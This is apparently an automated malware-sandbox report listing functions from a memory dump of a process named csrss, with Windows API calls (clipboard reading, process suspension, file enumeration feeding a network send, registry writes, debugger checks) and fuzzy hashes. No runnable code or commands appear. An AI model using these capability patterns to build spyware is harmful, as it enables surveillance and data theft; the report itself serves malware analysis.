Function 33D7BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 33D7BC1A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 33D7BC24
UnhandledExceptionFilter.KERNEL32(?), ref: 33D7BC31

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 90ebafd35c30e3325d52842c460076dbb4aa993f8e956f35419726da89e877d2
Instruction ID: 8481dcd077993303f353e9ce8fbfb634ea3a883be152038f74753197416bd331
Opcode Fuzzy Hash: 90ebafd35c30e3325d52842c460076dbb4aa993f8e956f35419726da89e877d2
Instruction Fuzzy Hash: E531C475D0131D9BCB21DF64D988B9DBBB8BF08710F5041EAE41CA7250EB309B818F55

Function 33D832B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002,00000000,?,33D86136,00000003), ref: 33D832D6
TerminateProcess.KERNEL32(00000000,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002,00000000,?,33D86136,00000003), ref: 33D832DD
ExitProcess.KERNEL32 ref: 33D832EF

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0f445ff9240dbf08596cbbf2e5bfd7c1d0351243f0f057c08be99ee618803641
Instruction ID: 5469b8479955b3a0a585a12692917dbfb2c7f8371f49ca4f3a125094a2ec9ac8
Opcode Fuzzy Hash: 0f445ff9240dbf08596cbbf2e5bfd7c1d0351243f0f057c08be99ee618803641
Instruction Fuzzy Hash: 0EE0EC76801248EFCF426F64C909A983BA9FF41782F444114F90E9E931CB36EE52CB90

Function 33D5BB09 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,33D55FFF), ref: 33D5BB14
NtSuspendProcess.NTDLL(00000000), ref: 33D5BB21
CloseHandle.KERNEL32(00000000), ref: 33D5BB2A

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Process$CloseHandleOpenSuspend
String ID:
API String ID: 1999457699-0
Opcode ID: db888e9062932826b2e53746eee0d9428d8340a13c5561e3c2d505e683bdce2c
Instruction ID: 7776f36679f039fe89daf57a0b21ab0d8f90c7124bdb0e45bce6c1fdcaf6a42d
Opcode Fuzzy Hash: db888e9062932826b2e53746eee0d9428d8340a13c5561e3c2d505e683bdce2c
Instruction Fuzzy Hash: 59D0A737600031A3CB212BAAAC0CE57BEBCEFC5DA17060119F505E31049A708802C6F0

Function 33D5BB35 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,33D56024), ref: 33D5BB40
NtResumeProcess.NTDLL(00000000), ref: 33D5BB4D
CloseHandle.KERNEL32(00000000), ref: 33D5BB56

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Process$CloseHandleOpenResume
String ID:
API String ID: 3614150671-0
Opcode ID: 3e4023ff24d1f6d5bcb7a10b958d18024bddd3bca34c8278baa399342bab7331
Instruction ID: 468cc68b7a195c1a9f5d331cc8000c51323fa78b005db1d016f797a0c467630b
Opcode Fuzzy Hash: 3e4023ff24d1f6d5bcb7a10b958d18024bddd3bca34c8278baa399342bab7331
Instruction Fuzzy Hash: 25D0C73B605131A7C721376AAC1CD57AFBDEFD5DA27064119F505E3244AA708802C6F1

Function 33D4B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 33D4B711
GetClipboardData.USER32(0000000D), ref: 33D4B71D
CloseClipboard.USER32 ref: 33D4B725

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: e860491a94fe36a7ab4ee96468a142ee62fa07f01d273739afd15f7a498e437b
Instruction ID: 0c96af363cb6b65b39487eb08ee23d4f2715dc457f39b37bc3f705f7371123f1
Opcode Fuzzy Hash: e860491a94fe36a7ab4ee96468a142ee62fa07f01d273739afd15f7a498e437b
Instruction Fuzzy Hash: 94E0C236A46320AFD710BF60CD48B8A77909F78F91F408018B58AAA280CF708840C670

Function 33D59AF5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 33D59D4B

Part of subcall function 33D5C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 33D5C49E

Strings

H#z, xrefs: 33D59BD5

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: File$CreateFindFirst
String ID: H#z
API String ID: 41799849-2410801705
Opcode ID: 79cc14a80123374264cf3ed7050354fa648de42d4ca8ab325b3e47020a0ace4b
Instruction ID: efd93d7951ba4b017713470056aa5f9dd48514804b4714a5c8e260fd49ca9354
Opcode Fuzzy Hash: 79cc14a80123374264cf3ed7050354fa648de42d4ca8ab325b3e47020a0ace4b
Instruction Fuzzy Hash: D78184329483409BD714EB32CC50EEFB7A9AFA0250F80492DF597539D1EF309A4AC762

Function 33D74C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 33D74C6B

Strings

, xrefs: 33D74DD2

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-3916222277
Opcode ID: c5e5794c52fbd7007340951b70aacc40b7a89344ac5264be298e0dede921321c
Instruction ID: 984bd5b0906245f9b06ab0ef29d4cfd95ba6d61d9e92778f5f2bf992c117c05c
Opcode Fuzzy Hash: c5e5794c52fbd7007340951b70aacc40b7a89344ac5264be298e0dede921321c
Instruction Fuzzy Hash: 0C518CB6D00208DBEB05CF66C48169EBBF4FF08350F65846ED895EB244E3349A51CFA0

Function 33D8E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 33D8EA0C

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 3d01253d2080a79ced6e1ad3291c0a3a8416a9c5297687d6e321cbf93b4d25f2
Instruction ID: 8888cc9fef12e3c1b72ec227c880f33dca4ef1b5b84604f8b980d597c9aba988
Opcode Fuzzy Hash: 3d01253d2080a79ced6e1ad3291c0a3a8416a9c5297687d6e321cbf93b4d25f2
Instruction Fuzzy Hash: 5F315CB6800209AFDB14DF39CC84EEE7BBDEF85704F04019CE458DB261E670A9458FA0

Function 33D5C9E2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 33D5CAD7

Part of subcall function 33D5376F: RegCreateKeyA.ADVAPI32(80000001,00000000,33DA74AC), ref: 33D5377E
Part of subcall function 33D5376F: RegSetValueExA.KERNEL32(33DA74AC,33DA74B8,00000000,?,00000000,00000000,33DB52F0,?,?,33D4F853,33DA74B8,33DA74AC), ref: 33D537A6
Part of subcall function 33D5376F: RegCloseKey.ADVAPI32(33DA74AC,?,?,33D4F853,33DA74B8,33DA74AC), ref: 33D537B1

Strings

Control Panel\Desktop, xrefs: 33D5CA1D, 33D5CA50, 33D5CAA0

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop
API String ID: 4127273184-27424756
Opcode ID: db77911f2f80ace8110833518f13f3e0bd2077e679e38bb1354efcd15d210d9d
Instruction ID: 9899593b55380ba50ad5aeb59ba531f87b643b6037ca9f09a38c43d9bdd2892a
Opcode Fuzzy Hash: db77911f2f80ace8110833518f13f3e0bd2077e679e38bb1354efcd15d210d9d
Instruction Fuzzy Hash: A6117F62F81200B7FC15713D8E27F6E2D86A346A60F840199F5627BAC6E9C30A5946E3

Function 33D888ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,33D844CA,?,00000004), ref: 33D88940

Strings

GetLocaleInfoEx, xrefs: 33D88908

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6a79ecafc7c7cd60e05106f1c8c19a7f9546bb47860dadc52e81ab487320e30
Instruction ID: 65bb943d3acd86060b578001664a81c147c96517034026498e96b4868249fc99
Opcode Fuzzy Hash: f6a79ecafc7c7cd60e05106f1c8c19a7f9546bb47860dadc52e81ab487320e30
Instruction Fuzzy Hash: CBF09672901208FBDB01AF70DD04EAE7B65DF04652F004555FC057A150DA7169269AD5

Function 33D861F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59dafb57e5b7b13d3bd24c2dac195c6547dac3f36cdd53fec792f45fd62dfc08
Instruction ID: bc380f1cb4dc180e81be73f7b6472f72be50f5860b546206be95a6b9fa74c459
Opcode Fuzzy Hash: 59dafb57e5b7b13d3bd24c2dac195c6547dac3f36cdd53fec792f45fd62dfc08
Instruction Fuzzy Hash: 4D026D71E012199FDF14CFA9C88069DB7F5FF48724F1942A9D919EB384D730AA01CB90

Function 33D4783C Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 33D47857
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 33D4791F

Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: 51f55094468c4f9b3814a210b9b3651babb35caaf7076b9d00a173a66e58b0b7
Instruction ID: f2a169bda094f4b6df94077992743f2189aa5943773d57fd541dcb12030c29fe
Opcode Fuzzy Hash: 51f55094468c4f9b3814a210b9b3651babb35caaf7076b9d00a173a66e58b0b7
Instruction Fuzzy Hash: 7C21BD329083459BC714EBA1DC94DEFB7ACAF94314F80091DF59652891FF309A0ECAA2

Function 33D52077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?), ref: 33D520E7
HeapFree.KERNEL32(00000000), ref: 33D520EE

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: ac4a61e3bc4b0059b77a8e6ac75ce8cbb0da19b62caf5e857593b4c199d12b3d
Instruction ID: 268a32c30b1ad2e697b7cf24ec9fd14e5f0e5b1bdd117b93f93c867ffa67cba3
Opcode Fuzzy Hash: ac4a61e3bc4b0059b77a8e6ac75ce8cbb0da19b62caf5e857593b4c199d12b3d
Instruction Fuzzy Hash: 4F112772401B11EFEB309F68CD84817BBEAFF04B61744882DF19656821CB32F8A0CB10

Function 33D9332B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,33D93326,?,?,00000008,?,?,33D961DD,00000000), ref: 33D93558

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e0774ad973aa10d8f5670b939e023c5d8cf0cb5a9390495d9af7946191dc948d
Instruction ID: 2f6d3295df5a26a2a629108c8cc69ddf4985c64e3789774245761a5d67f69383
Opcode Fuzzy Hash: e0774ad973aa10d8f5670b939e023c5d8cf0cb5a9390495d9af7946191dc948d
Instruction Fuzzy Hash: 62B16A75610608DFE706CF28C486B957BE0FF09364F698698E8DACF6A1C735E991CB40

Function 33D73946 Relevance: 1.8, Strings: 1, Instructions: 501COMMON

Download Yara Rule

Strings

0, xrefs: 33D73952

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 2a22b1801232c943a5a373c60be4a0da1def4812596029484c738936714c4f65
Instruction ID: b0ada6ac11631f4ca299d4fe8a1778fdf27b7ead25b6e95e1cf56abc0e5d32a5
Opcode Fuzzy Hash: 2a22b1801232c943a5a373c60be4a0da1def4812596029484c738936714c4f65
Instruction Fuzzy Hash: 98125C32B083008BD714CF79D851A1FB3E2BFCC764F15892DE585AB691DA74E8068B96

Function 33D92313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

Part of subcall function 33D88215: _free.LIBCMT ref: 33D88274
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D88281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 33D92367

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 2777c31b0fb3f723af3bd72fc4a8315f7de7e342d8d0c78b233d8d9aa78cf82b
Instruction ID: 1ddef7162eb7887aef6db8e926f172d24aa42ec795811754647a70ce9ee69f07
Opcode Fuzzy Hash: 2777c31b0fb3f723af3bd72fc4a8315f7de7e342d8d0c78b233d8d9aa78cf82b
Instruction Fuzzy Hash: 7421BE76D0030AABFB54DE28DC41BEA73ACEB09711F1401AEED01DA940EB34A941CB60

Function 33D91F9B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

EnumSystemLocalesW.KERNEL32(33D920C3,00000001,00000000,?,33D84A6C,?,33D926F0,00000000,?,?,?), ref: 33D9200D

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: d12d94c34335dd59f4d028e787d4023eebaafabbd481ada90aff968bbc4c78d4
Instruction ID: 509d9a195fb14f2923a3d7193750c3e7dcaa3b8e94964d92d27cf53b95b016ef
Opcode Fuzzy Hash: d12d94c34335dd59f4d028e787d4023eebaafabbd481ada90aff968bbc4c78d4
Instruction Fuzzy Hash: 0A11253B6007059FFB189F39C8906BABB91FF80758B19442CD94B87A40D771B552CB50

Function 33D92543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,33D922E1,00000000,00000000,?), ref: 33D9256F

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 9caccd9db599cab614c5ea57c9644ab52f7b633ef884dd9a489aa13165d66e05
Instruction ID: f0b98d3f62e11cced07cdfa687e35015c2c990b66f44c13787962c05e9ce1287
Opcode Fuzzy Hash: 9caccd9db599cab614c5ea57c9644ab52f7b633ef884dd9a489aa13165d66e05
Instruction Fuzzy Hash: 47F07D3A90021EABF7946A20C815BFA376CEF40B54F444428EC15A3180EB70FE41C6E0

Function 33D92036 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

EnumSystemLocalesW.KERNEL32(33D92313,00000001,?,?,33D84A6C,?,33D926B4,33D84A6C,?,?,?,?,?,33D84A6C,?,?), ref: 33D92082

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 4961388eda54b0da03a6176b25394dec682090bc1c26dbad486ef4303c7f9300
Instruction ID: 714c827048204dd56703356fbd5870d72cef9ffae99e025d417d61ad0abb903a
Opcode Fuzzy Hash: 4961388eda54b0da03a6176b25394dec682090bc1c26dbad486ef4303c7f9300
Instruction Fuzzy Hash: 5EF0463A2003085FF7245F39CC80BAA7B99FF807A8B0A442CE94A8B640D7B1A802C750

Function 33D88404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D85888: RtlEnterCriticalSection.NTDLL(?), ref: 33D85897

EnumSystemLocalesW.KERNEL32(33D883BE,00000001,33DAEAD0,0000000C), ref: 33D8843C

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: db50699392ae5a5b7a5f9313b7437da5e6cf7169ed5d0dfcc37df6e9ffe6e5fa
Instruction ID: a341a3c0130f363ec10adeb80ef540e0e79e45628b0d2ac3445c09f939406d6e
Opcode Fuzzy Hash: db50699392ae5a5b7a5f9313b7437da5e6cf7169ed5d0dfcc37df6e9ffe6e5fa
Instruction Fuzzy Hash: 4FF03773A50208EFD710EF78C885B4977F1EB04321F1089AAE420EF291DA749A968F64

Function 33D91F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293

EnumSystemLocalesW.KERNEL32(33D91EA7,00000001,?,?,?,33D92712,33D84A6C,?,?,?,?,?,33D84A6C,?,?,?), ref: 33D91F87

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 9d8f3851fc826d1f28d4b11213bcb78c7c472a75523d09af0a0821ee64806821
Instruction ID: aec2cc948c1dfaef73cbb62254c6f6d547254efe1285400bfa23e83df3f1958f
Opcode Fuzzy Hash: 9d8f3851fc826d1f28d4b11213bcb78c7c472a75523d09af0a0821ee64806821
Instruction Fuzzy Hash: 92F0E53A7402499BE704AF39C844BAA7F94EFC2765B4A4098EA058BA41C771A942CB60

Function 33D4F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,33D554FC,33DB4EE0,33DB5A00,33DB4EE0,00000000,33DB4EE0,00000000,33DB4EE0,33DA74AC), ref: 33D4F8E5

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 0506f613ec5e7da38e0cbfbe6296570f6e72c08b55ccd8948428299c5f09cac9
Instruction ID: f698879ebe7906d3f6b7828ba79500cadd33cc0569d86dcce8b78634ede07a83
Opcode Fuzzy Hash: 0506f613ec5e7da38e0cbfbe6296570f6e72c08b55ccd8948428299c5f09cac9
Instruction Fuzzy Hash: 1AD05B31B4421C77D6109695CC0AEAA77DCD705651F000195BA09D72C0E9E15E1087E1

Function 33D7E0CC Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 33D7E23C

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d0ee7b214a71d2ffc998cf6d553ae11cb55276461d01a7623ff75e595a9df9ce
Instruction ID: f5d8a2c3b42112e9612a4ea68ff5f248d555683f93759f852b5c288c4dd6ed5c
Opcode Fuzzy Hash: d0ee7b214a71d2ffc998cf6d553ae11cb55276461d01a7623ff75e595a9df9ce
Instruction Fuzzy Hash: 81515FB9B00758A7FB108DA4C9537AEE7CE9F42A44F880919DCC1CB6B1C915EB49C362

Function 33D7DE9D Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 33D7E00D

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8d0f64db998f072635cf1eb458ceab3fd2b8b3f2bf3093cc42065a95c29079be
Instruction ID: ee4b7960e88ec8874f13d8f3399c7d12977175fc5149fceab504c66ba2ad0349
Opcode Fuzzy Hash: 8d0f64db998f072635cf1eb458ceab3fd2b8b3f2bf3093cc42065a95c29079be
Instruction Fuzzy Hash: DF51B5B96147849BFB218E3485717EFA7DD9F12A40F8C090ED8C2CBAA9CA05D507C361

Function 33D5DB62 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0502e7cedfe668b651b3b048a3ad7082830145b99f9b15599d56faabec3b0d4b
Instruction ID: e2b9f9a1b9053c0b325813b4f08563d268292efe723c77146510ed75f1cd07ce
Opcode Fuzzy Hash: 0502e7cedfe668b651b3b048a3ad7082830145b99f9b15599d56faabec3b0d4b
Instruction Fuzzy Hash: 19B1807911429A8ADF05EF28C4913E63BA1EF6A300F4850B9EC9CCF75AD3358506EB34

Function 33D570C2 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e62b9aacb0936c466fd3d86c506860f9df5cb35f805f03fa52f98f0b7708fce
Instruction ID: 2a81531e62f10bd0b12693351b3772b041fbf7484676a98ea446e7eba311df45
Opcode Fuzzy Hash: 8e62b9aacb0936c466fd3d86c506860f9df5cb35f805f03fa52f98f0b7708fce
Instruction Fuzzy Hash: 66413AB2C099484EE706AFB0D9561D5BB70EFE7320754928BD1811F4A2DAE0A657CFC3

Function 33D57121 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825eaf685df39af488c4f92dce5f5f3bbfb0d7c795e84e93e25e0ed7f58f9936
Instruction ID: 3fe0eb43af9a9087c1bf253436a6638bcf434a2f8ca4bdadc0ab5449b7318a13
Opcode Fuzzy Hash: 825eaf685df39af488c4f92dce5f5f3bbfb0d7c795e84e93e25e0ed7f58f9936
Instruction Fuzzy Hash: 3A3148B28099884AD716AB7099971D1BF60FFE7320754968BC1811E4A2D6E0EA57CFC3

Function 33D7E2FB Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fedda4d9ca6f521b39dafd7f748c08fa085f514d70900713aa905dabea7deedc
Instruction ID: 599035124a91bd05021076a5ccddaf526918dc3f9161cb6d6778b94e2d004f62
